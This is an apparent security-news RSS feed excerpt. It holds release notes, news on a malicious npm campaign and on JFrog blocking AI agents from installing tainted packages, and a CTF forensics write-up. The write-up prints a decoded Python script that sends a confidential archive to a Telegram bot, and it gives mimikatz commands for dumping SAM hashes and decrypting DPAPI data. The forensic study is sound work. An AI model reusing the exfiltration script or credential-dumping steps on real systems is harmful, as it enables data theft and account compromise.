<li><strong>PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4631831678" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/3010" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/3010/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/3010">#3010</a></strong> — lock slim default prompt with calm-overlay regression test.</li>
<li><strong>PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4601310816" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/2808" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/2808/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/2808">#2808</a></strong> — thread undo/retry and snapshot restore endpoints.</li>
<li><strong>PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4635964128" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/3051" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/3051/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/3051">#3051</a></strong> — voice input commands and hotbar integration.</li>
<li><strong>PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4594023769" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/2773" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/2773/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/2773">#2773</a></strong> — activate provider fallback chain.</li>
<li><strong>PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4602705372" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/2851" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/2851/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/2851">#2851</a></strong> — command strategy registry.</li>
</ul>
<h2>Other fixes and improvements</h2>
<ul>
<li><strong>macOS Command modifier normalized to Control</strong> for keyboard shortcuts<br>
(<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619243036" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/2938" data-hovercard-type="issue" data-hovercard-url="/Hmbown/CodeWhale/issues/2938/hovercard" href="https://github.com/Hmbown/CodeWhale/issues/2938">#2938</a>).</li>
<li><strong>Hotbar slots dispatched from number keys</strong>.</li>
<li><strong>Thread goals persisted through the app server</strong>.</li>
<li><strong>Concise verbosity mode added</strong> to config.</li>
<li><strong>Workspace trust required for project hooks</strong> — safety boundary<br>
enforced.</li>
<li><strong>Thread detail item reads batched</strong> — N+1 query fix.</li>
<li><strong>Legacy deepseek users guided to codewhale</strong> in update paths.</li>
<li><strong>Static Linux x64 musl binaries</strong> now built.</li>
<li><strong>Approval rule metadata exposed at runtime</strong>.</li>
<li><strong>Codex response errors clarified</strong> in TUI.</li>
<li><strong>Microsoft Build Tools / cmake --build</strong> shell compatibility fix.</li>
<li><strong>PDF extraction hardened</strong> for non-Identity-H CMap fonts.</li>
</ul>
<hr>
<p><strong>Full headless sub-agents (fleet manager, worker runtime, durable inbox/ledger)<br>
are deferred to v0.8.60 / <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644773540" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/3096" data-hovercard-type="issue" data-hovercard-url="/Hmbown/CodeWhale/issues/3096/hovercard" href="https://github.com/Hmbown/CodeWhale/issues/3096">#3096</a>.</strong> The v0.8.59 release includes the<br>
sub-agent safety and worker-ledger substrate that v0.8.60 builds on.</p>
<p><strong>v0.8.60+ tracking issues remain open:</strong></p>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644773540" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/3096" data-hovercard-type="issue" data-hovercard-url="/Hmbown/CodeWhale/issues/3096/hovercard" href="https://github.com/Hmbown/CodeWhale/issues/3096">#3096</a> — Full headless sub-agents and worker runtime</li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4412763661" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/1310" data-hovercard-type="issue" data-hovercard-url="/Hmbown/CodeWhale/issues/1310/hovercard" href="https://github.com/Hmbown/CodeWhale/issues/1310">#1310</a> — MiniMax first-party provider</li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653379025" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/3187" data-hovercard-type="issue" data-hovercard-url="/Hmbown/CodeWhale/issues/3187/hovercard" href="https://github.com/Hmbown/CodeWhale/issues/3187">#3187</a> — Z.ai / StepFlash first-party providers</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious npm Campaign Steals SSH Keys, API Tokens, Cloud Credentials, and Wallet Secrets]]></title>
<description><![CDATA[A fresh wave of supply chain attacks is putting blockchain developers, Web3 teams, and cloud engineers at serious risk. Researchers have uncovered a coordinated campaign involving multiple malicious packages on the npm registry, each designed to quietly steal sensitive secrets…
Read more →
The po...]]></description>
<link>https://tsecurity.de/de/3594209/it-security-nachrichten/malicious-npm-campaign-steals-ssh-keys-api-tokens-cloud-credentials-and-wallet-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594209/it-security-nachrichten/malicious-npm-campaign-steals-ssh-keys-api-tokens-cloud-credentials-and-wallet-secrets/</guid>
<pubDate>Fri, 12 Jun 2026 19:39:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fresh wave of supply chain attacks is putting blockchain developers, Web3 teams, and cloud engineers at serious risk. Researchers have uncovered a coordinated campaign involving multiple malicious packages on the npm registry, each designed to quietly steal sensitive secrets…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malicious-npm-campaign-steals-ssh-keys-api-tokens-cloud-credentials-and-wallet-secrets/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malicious-npm-campaign-steals-ssh-keys-api-tokens-cloud-credentials-and-wallet-secrets/">Malicious npm Campaign Steals SSH Keys, API Tokens, Cloud Credentials, and Wallet Secrets</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NanoClaw and JFrog launch 'immune system' to block AI agents from downloading malicious code]]></title>
<description><![CDATA[The creators of the hit, enterprise-friendly, open source OpenClaw variant NanoClaw are partnering with software supply chain management leader JFrog have to launch a new, joint security integration they say will protect NanoClaw autonomous agents from malicious code injection. "These agents are ...]]></description>
<link>https://tsecurity.de/de/3594132/it-nachrichten/nanoclaw-and-jfrog-launch-immune-system-to-block-ai-agents-from-downloading-malicious-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594132/it-nachrichten/nanoclaw-and-jfrog-launch-immune-system-to-block-ai-agents-from-downloading-malicious-code/</guid>
<pubDate>Fri, 12 Jun 2026 19:05:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The creators of the hit, enterprise-friendly, open source OpenClaw variant <a href="https://venturebeat.com/orchestration/nanoclaws-creators-are-turning-the-secure-open-source-ai-agent-harness-into-an-enterprise-second-brain">NanoClaw</a> are partnering with software supply chain management leader <a href="https://jfrog.com/">JFrog</a> have to launch a new, joint security integration they say will protect NanoClaw autonomous agents from malicious code injection. </p><p>"These agents are doing things that you cannot necessarily control, and you cannot necessarily train," said Gal Marder, Chief Strategy Officer at JFrog, in an exclusive interview with VentureBeat.</p><p>Available immediately, the partnership hardwires NanoClaw agents directly to JFrog’s vetted software registries, ensuring that AI assistants can only pull scanned, safe dependencies. </p><p>The release addresses a rapidly growing blind spot in tech: autonomous agents frequently install packages in the background to extend their capabilities, often without their human operators' knowledge or oversight. </p><p>"The people who are operating the agents are not necessarily developers, and they are not even aware of the implications," explained Gavriel Cohen, creator of NanoClaw and CEO and co-founder of its new commercial services startup, NanoCo AI. </p><p>To secure the broader ecosystem, the integration is available completely free of charge for the open-source community, while enterprise organizations can seamlessly route their agents through their existing, commercially licensed JFrog environments.</p><p>The new technical capability enabled by this partnership follows NanoCo's moves to add permissions dialogs across the apps in which it's available via <a href="https://venturebeat.com/orchestration/should-my-enterprise-ai-agent-do-that-nanoclaw-and-vercel-launch-easier-agentic-policy-setting-and-approval-dialogs-across-15-messaging-apps">a partnership with Vercel</a>, and a <a href="https://venturebeat.com/infrastructure/nanoclaw-and-docker-partner-to-make-sandboxes-the-safest-way-for-enterprises">new partnership with Docker to allow NanoClaw</a> agents to run more securely, isolated from other software environments directly inside Docker virtual containers. </p><h2><b>The risk of current, personal autonomous AI agents </b></h2><p>When an operator interacts with an autonomous system like NanoCo's NanoClaw, they communicate at a high level of abstraction. </p><p>A user might simply send an audio file or a voice note, prompting the agent to independently figure out how to process it. </p><p>As Cohen explained, the agent thinks, "oh, I can't understand voice notes, so let me go and grab a package and download something and install it and set it up and run it".</p><p>This dynamic self-improvement makes AI agents incredibly powerful, but it also renders them highly susceptible to software supply chain attacks. </p><p>Bad actors are increasingly poisoning open-source registries with malicious packages. Because agents act autonomously to fetch what they need, they bypass human scrutiny. </p><p>The operators, who may not even be developers, are largely unaware of the security implications unfolding behind the scenes.</p><h2><b>How NanoCo and JFrog are working to stop agents from running malicious code</b></h2><p>The integration between NanoCo and JFrog acts as an automated immune system for these AI environments.</p><p>Under the hood, NanoClaw agents are now configured to route their requests for software packages, CLI tools, and Model Context Protocol (MCP) servers exclusively through JFrog’s registries.</p><p>If an agent attempts to download a compromised library—such as a vulnerable version of the popular Axios package—the JFrog registry intercepts the request.</p><p>It blocks the installation, returning a security policy error to the agent, noting that the request was "rejected by JFrog's registry with a 403 security policy". </p><p>Crucially, the system does not just stop at blocking the threat; it creates a dynamic correction loop. The agent is notified of the vulnerability and guided to automatically seek out and install an approved, non-malicious version of the requested package instead.</p><p>For large organizations, this integration solves a massive compliance headache. Marder notes that as enterprises adopt autonomous agents, they require absolute visibility. </p><p>Organizations need "a system of record, we need somewhere to track what agents that's running by whom and consuming what packages and using what skills and using what MCPs," he told VentureBeat.</p><p>Beyond visibility, the JFrog integration provides a foundational "trust layer" and strict governance over what these automated systems are permitted to access.</p><h2><b>Licensing and accessibility</b></h2><p>In the realm of software distribution, licensing and access parameters dictate adoption. The NanoCo and JFrog partnership utilizes a dual-track approach to serve both individual open-source developers and highly regulated enterprises.</p><p>For the open-source community, the integration is completely free. JFrog is providing open-source NanoClaw users with complimentary access to safe, vetted sources of artifacts, tools, and skills. </p><p>This allows individual developers to run autonomous agents locally without drowning in manual approval requests for every single dependency. Furthermore, as community members build and share new "skills" for the agents, these contributions are uploaded to the registry, scanned for malicious code, and cleared before anyone else can use them. </p><p>This infrastructure directly neutralizes the threat of poisoned community repositories.</p><p>For enterprise deployments, the architecture plugs seamlessly into an organization's existing commercial environment. Rather than using the public open-source registry, corporate users point their NanoClaw agents to their own internal JFrog registries. </p><p>This ensures that all agent activity adheres to the company’s specific commercial licenses, internal security policies, visibility needs, and governance standards.</p><p>As AI continues to blur the line between human intent and machine execution, the infrastructure securing that execution must evolve. This partnership acknowledges a core reality: you cannot train an AI to perfectly recognize every zero-day vulnerability; instead, you must build an environment where the agent simply cannot reach the vulnerability in the first place.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious npm Campaign Steals SSH Keys, API Tokens, Cloud Credentials, and Wallet Secrets]]></title>
<description><![CDATA[A fresh wave of supply chain attacks is putting blockchain developers, Web3 teams, and cloud engineers at serious risk. Researchers have uncovered a coordinated campaign involving multiple malicious packages on the npm registry, each designed to quietly steal sensitive secrets the moment a develo...]]></description>
<link>https://tsecurity.de/de/3593956/it-security-nachrichten/malicious-npm-campaign-steals-ssh-keys-api-tokens-cloud-credentials-and-wallet-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593956/it-security-nachrichten/malicious-npm-campaign-steals-ssh-keys-api-tokens-cloud-credentials-and-wallet-secrets/</guid>
<pubDate>Fri, 12 Jun 2026 18:04:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fresh wave of supply chain attacks is putting blockchain developers, Web3 teams, and cloud engineers at serious risk. Researchers have uncovered a coordinated campaign involving multiple malicious packages on the npm registry, each designed to quietly steal sensitive secrets the moment a developer installs them. From SSH private keys to cloud credentials, wallet phrases […]</p>
<p>The post <a href="https://cybersecuritynews.com/malicious-npm-campaign-steals-ssh-keys-api-tokens/">Malicious npm Campaign Steals SSH Keys, API Tokens, Cloud Credentials, and Wallet Secrets</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges]]></title>
<description><![CDATA[IEEE Victoris 4.0 — CTF 2025 —Quals DFIR ChallengesHi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.First Challenge: “the Frontdoor” FIRST BLOOD🩸in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the ...]]></description>
<link>https://tsecurity.de/de/3592750/hacking/ieee-victoris-40-ctf-2025-quals-dfir-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592750/hacking/ieee-victoris-40-ctf-2025-quals-dfir-challenges/</guid>
<pubDate>Fri, 12 Jun 2026 09:33:33 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>IEEE Victoris 4.0 — CTF 2025 —Quals DFIR Challenges</h3><p>Hi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/843/1*r7vTPHgC_0t6kAXxFx3N3w.png"></figure><p>First Challenge: “the Frontdoor” <strong>FIRST BLOOD</strong>🩸</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/495/1*3HO6z-6mliIaDQWTDIdYQA.png"></figure><p>in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the bash history or “.zsh_history” we can view that there’s a lot of file navigations commands, and Git activity in “MyProject” which located in /home/Documents.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*F4F7ja4jNJLXS8fvZVKJaQ.png"></figure><p>also, while i was digging around all linux files, i found an xml file “recently-used.xml” located in “/home/kali/.local/share/recently-used.xml”. this xml tracks that he opened /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar “kali linux gui”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ohWftXZJyRAjWf0oFxuMaw.png"></figure><p>so, configfile will be first file to check in MyProjectdirectory</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1009/1*UyQzYFMbtxYv-QzRQDDicQ.png"></figure><p>we can see there’s a beautiful base64 encoded that contains our flag:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/855/1*aCdLTbSVud0hl10YXYp-yA.png"></figure><pre>IEEE{192.168.213.68:3421}</pre><p>Second Challenge: “<strong>Lay-off</strong>” <strong>FIRST BLOOD</strong>🩸</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/450/1*TTZ1qGQeR4PTvxxgYHpGxA.png"></figure><p>this one was so challenging, we got 14 questions that needs to be answered correctly to get our very precious flag</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kHHnZbOj_KAfLcWu4z6BiA.png"></figure><pre>=== Question Menu ===<br>Unanswered:<br>  1) What is the full name of the employee who sent the email?<br>  2) When was QR Tag company founded? (format: year)<br>  3) What website did the developer log into at 2025-09-18 17:56:51?<br>  4) what was the first thing the developer looked for after receiving the email?<br>  5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?<br>  6) Can you determine the number of files have been leaked?<br>  7) When did this archive get deleted?<br>  8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?<br>  9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>  10) Which telegram API did the developer use to send the archive to the bot?<br>  11) What is the username and password of the database used in QR Tag website? (format: username:password)<br>  12) What version of express did the developer use?<br>  13) What service will the QR Tag partnership provide?<br>  14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?</pre><p>we have a windows disk image, and an email :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/374/1*JVkqWJkKf_TmjOvMphJKAA.png"></figure><pre>1) What is the full name of the employee who sent the email?</pre><p>open the email with thunderbird, you'll find the correct answer easily:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iJSzHFWHv0nobrFxeZE8ag.png"></figure><pre>1) What is the full name of the employee who sent the email? --&gt; Huda Ahmed</pre><pre>2) When was QR Tag company founded? (format: year)</pre><p>with an online research on linkedin, we'll find in image with same name located in Egypt, Ismailia.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Bh6y9oU10XLNDQlznyb9xQ.png"><figcaption><strong>challenge author follows this page</strong></figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/186/1*KC82e8NCoIrYFGklYoZ-6g.png"></figure><pre>2) When was QR Tag company founded? (format: year) --&gt; 2024</pre><pre>3) What website did the developer log into at 2025-09-18 17:56:51?</pre><p>“<strong>log into</strong>” , by checking the Microsoft edge History database, which located in: C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Edge\User Data\&lt;Profile&gt;\History</p><p>in urls table, sort them by time and go to the following website to decode the time:</p><p><a href="https://www.epochconverter.com/webkit">WebKit/Chrome Timestamp Converter</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CKNUs9pqA2WuXvtYIal1sQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*MbwVthWRGbeoiIkgWsUwUA.png"><figcaption><strong>time is perfectly correct</strong></figcaption></figure><pre>3) What website did the developer log into at 2025-09-18 17:56:51?<br>   Answer: www.qrtagapp.com</pre><pre>4) what was the first thing the developer looked for after receiving the email?</pre><p>using thunderbird, open the email with message source, or open the email with any text editor:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/579/1*E4Gsez-x9XrpnbP_zrk-NA.png"></figure><p>so, the correct time must be “<strong>2025–09–19 00:08:59</strong>” in GMT +3</p><p>now let’s find anything intresting, but in the history database of firefox, located in: C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;profile folder&gt;\places.sqlite</p><p>you'll find that, the most recent search after the email was send was all these searches in “<strong><em>moz_places</em></strong>” table:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*357pilL9LM4ujk4fa3LMbw.png"></figure><pre>4) what was the first thing the developer looked for after receiving the email?<br>   <br>   Answer: telegram leaks channels</pre><pre>5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?</pre><p>this was a little dizzy, but what i did was parsing the prefetch files with PECMD <a href="https://ericzimmerman.github.io/#!index.md"><strong>here</strong></a>, and see if there any zip, rar, 7z, gz and so on.</p><p>And yes, i found the prefetch data for using 7z.exe:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/834/1*ja5aSOG_bDC_wKy2dJj36A.png"></figure><p>now let’s check for all files referenced, we can see a 7z file located on MHANY’s desktop:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/876/1*RrvUM43PjOtLcotdMysp1w.png"></figure><pre>5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?<br>   CONFIDENTIAL.7Z</pre><pre>6) Can you determine the number of files have been leaked?</pre><p>that’s so simple, in the prefetch we did parse we can view all files that was compressed and have been leaked:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ta5ol6w7Sdnpq_GOStubZg.png"></figure><p>just count all files below CONFIDENTIAL.7Z file:</p><pre>6) Can you determine the number of files have been leaked? --&gt; 11</pre><pre>7) When did this archive get deleted?</pre><p>parsing the $J file with MFTECMD <a href="https://ericzimmerman.github.io/#!index.md"><strong>here</strong></a>, which located inC:\$Extend\$J<br>to see all File creation, deletion, renaming timestamps.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rNw6Ri4X0W-n-ReIizk3Og.png"></figure><p>we got the deleted timestamp correctly, 9/19/2025 8:05:17 AM GMT 0.</p><p>convert it to the correct format for the flag answer, and add 3 hours to become GMT +3 as the Local Egyptian Time, then subtract 1 sec.</p><pre>7) When did this archive get deleted?<br>   Answer: 2025-09-19 11:05:16</pre><pre>8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?</pre><p>this question needs deep investigation, and a good eyesight to catch malicious scripts. found a python file in temp called botscript.py full path: C:\Users\mhany\AppData\Local\temp\botscript.py that contains a too long base64 encoded string:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e9zheBLyZA4DxXRjyr_TkA.png"></figure><p>it’s not just encoded, it’s reversed. And that’s because of this:</p><pre>b64decode(__[::-1]);</pre><p>so let's reverse it first, and decode the base64 <a href="https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=cFFIZWxSbkxsTm5idkIzY2xKSElzSWlPeTltY3lWa0lvUW5icEpIY2dBQ0lnb1FENlUyY3NWbUNOa2lJNXhHYjFaMmN6VjJZalYzY2dRbmJsTkhJbHhXYUdKQ0swNVdheUJISWdBQ0lLMGdPd0FqTWcwVFBnVUdadk4yWHpWSGRoUjNjdVUyY3U5R2N6Vm1jZ1lXYUswZ0NOa1NmbUJpT2lRbmJsMVdkajlHWmlzWFB6VkdicFpHSXMwWE14d1dTSkZEYnNsVU1nb2pJa2wyWDBGR2FqSnllOUVHZGhSR0lzd21jMWhDZHo5R2N1TUhkelZXZHhWbWNnMERJbE5uYnZCM2NsSkhJZ0FDSUswZ09tQnljaEJTS2lJbWNpQUNMSmxVTXN4V01KbFVNc2hpYmxCM2JnZ0dkcGRuQ05vUURpUW5ibDFXZGo5R1JrNVdaejlTZnh3V1NKeEdieEVUU3NGVFM3UjNiaTl5Wnk5bUx0Rm1jblZHYmxSbkxwQlhZdjhpT3pCSGQwaG1JbUJTUGd3bWMxcFFEbm8zTnV3V1lwUm5ibFJXYW01MmJEeEZjdlIzYXpWR1JjbG5iaGhXYmNObmNsTlhWY3B6UW5JSEk5QVNTSkZEYnNGVFNKRkRiSzBnSTVFVE55QUROeEl6TTFJQ0k5QVNNeHdXU0pGRGJzbFVNSzBnSTNSWFpySmtSZlptVWlCMVNpdDJWMzVHY2xwMFFFdEVjbEoxVG9OR2Q0SlhSQkZrT3dFRE0zSXpNMUlqTTRJQ0k5QVNNc2xVU3N4V014a0VieGtrQ05vUUR6UjNjbFZYY2xKSEkwSjNidzFXYQ&amp;oeol=CRLF"><strong>here</strong></a></p><pre>import requests<br><br>I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"<br>1Ill1IIl11 = "5321402519"<br>l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'<br>url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"<br><br>with open(l1II1ll1II, "rb") as f:<br>    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})<br><br>if response.status_code == 200:<br>    print("File sent successfully")<br>else:<br>    print("Error:", response.text)</pre><p>so, he sends the data over telegram bot using a python script</p><pre>8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?<br>   Answer: python</pre><pre>9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>10) Which telegram API did the developer use to send the archive to the bot?</pre><p>from the decoded base64 text we can answer these 2 questions easily</p><pre>import requests<br><br>I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"<br>1Ill1IIl11 = "5321402519"<br>l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'<br>url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"<br><br>with open(l1II1ll1II, "rb") as f:<br>    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})<br><br>if response.status_code == 200:<br>    print("File sent successfully")<br>else:<br>    print("Error:", response.text)</pre><p>simple python script. Read, Understand, Answer.</p><pre>9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)<br>Answer: 8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw:5321402519<br><br>10) Which telegram API did the developer use to send the archive to the bot?<br>Answer: /sendDocument</pre><pre>11) What is the username and password of the database used in QR Tag website? (format: username:password)</pre><p>since he is asking for the username, and password for the QR Tag website.</p><p>we can see there’s QRTag Portaldirectory on mhany’s desktop, that contains 2 other subdirectories (Backend &amp;Frontend). checking the Backend directory, we can find .envfile with absolute path: C:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend\.env</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/597/1*VOfYl_GaLcGcO_LEqprNXg.png"></figure><pre>11) What is the username and password of the database used in QR Tag website? (format: username:password)<br>Answer: H4ny:P@ssw0rd!</pre><pre>12) What version of express did the developer use?</pre><p>In the same Backend directoryC:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend we'll find package.json file that holds the correct answer</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/601/1*03OyPQ3xqNlhS6BK7U5UZA.png"></figure><pre>12) What version of express did the developer use?<br>Answer: 4.19.2</pre><pre>13) What service will the QR Tag partnership provide?</pre><p>checking the Docs directory which located in: C:\Users\mhany\Desktop\Work\QR Tag\Docs\ we can see there’s a pdf file calledpartnership_agreement.pdf “<strong>partnership</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/605/1*jQqQBzau5WjDvClCpWZomQ.png"></figure><pre>13) What service will the QR Tag partnership provide?<br>Answer: identity verification and fraud prevention</pre><pre>14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?</pre><p>Now, for the last juicy part.</p><p>in question 13, we could answer it with PDF file located in C:\Users\mhany\Desktop\Work\QR Tag\Docs\ directory.</p><p>So, while i was checking all other documents files, i found a file called <strong>finance.xlsx </strong>with a very strange magic bytes:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/600/1*_QngmJL0MUNTrhdsO8sVcw.png"><figcaption><strong>finance.xlsx</strong></figcaption></figure><p>of course, it’s not the traditional hex values for an excel file. to be more clearer, there’s an another excel file called <strong>user_accounts.xlsx</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/599/1*adUoqSwT8MTYHsfisagBFA.png"><figcaption><strong>user_accounts.xlsx</strong></figcaption></figure><p>See the difference!!!! <strong>finance.xlsx </strong>is definitely not an excel sheet file.</p><p>So, the question now, what it is actually ?</p><p>and the question says “<em>The developer used a security feature to securely encrypt a secret file</em>”.</p><p>so this file is encrypted with a windows security feature i guess!!</p><p>if we did a quick research on the magic bytes on google <strong>01 00 00 00 D0 8C</strong>, we can definitely get to the point.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*w8gjA9AesdtPRXeFAO-oaQ.png"><figcaption><strong>DPAPI</strong></figcaption></figure><p>also i did a very weird research, i uploaded the excel file on VirusTotal <a href="https://www.virustotal.com/gui/file/bfeddbd77a68f15e5489b851235c0c00e822f54446bf716309d35b6b44e30a33/details"><strong>link </strong></a>(first one to upload this file) and by reading Details section, we can definitely make sure that this file contains DPAPI encrypted data (100%)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/798/1*FEHuTsyLcDXhvTlUPkK_Zw.png"></figure><ol><li>we need to recover the DPAPI masterky to decrypt the file data.</li></ol><p>2. and to do recover the DPAPI masterkey, we need to decrypt the masterkey file. location: C\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;</p><p>3. and to decrypt the masterkey file, we need to recover the logon password for the user “mhany”</p><p>4. and to recover the logon password for this user, we need to decrypt <strong>SAM </strong>registry hive that contains the local account password hashes.</p><p>5. and to decrypt the <strong>SAM</strong> registry hive, we will need also the<strong>SYSTEM</strong>hive<br>which both are located in : C\Windows\System32\config\ directory</p><p>now we know what to do, let’s dig in using mimikatz “<a href="https://github.com/ParrotSec/mimikatz"><strong>link</strong></a>”. running mimikatx .exe file with administrative powershell, then use these commands</p><pre>privilege::debug  #Enables mimikatz to read protected data.<br><br>lsadump::sam /system:&lt;SYSTEM Hive path&gt;/sam:&lt;SAM Hive path&gt;  </pre><p>reading the output, remember we are looking for NTLM hash for mhanyuser only</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/372/1*JfJNV72Qx6C0W85kkth7gA.png"></figure><p>using rainbow-table attack with <a href="https://crackstation.net/"><strong>crackstation</strong></a><strong> </strong>we can get the actual password for this hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*875TmuY5AXqNZCopsBFpOQ.png"><figcaption><strong>credentials</strong></figcaption></figure><p>now we get the logon password, let’s recover the master key by decrypting the masterkey file. with mimikatz again, we can use these commands</p><pre>sekurlsa::lgonpasswords   # Because we already have the logon password<br><br>dpapi::masterkey /in:"path to: C\Users\mhany\AppData\Roaming\Microsoft\Protect\&lt;SID&gt;\&lt;GUID&gt;" /password:"credentials"</pre><p>now we can get the decrypted master key in hex.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fXyi9YeGe-Ncpq76Mz4sVw.png"></figure><p>final step, is to finally decrypt the encrypted finance.xlsx<strong> </strong>file with the key</p><pre>dpapi::blob /in:"path to C:\Users\mhany\Desktop\Work\QR Tag\Docs\finance.xlsx" 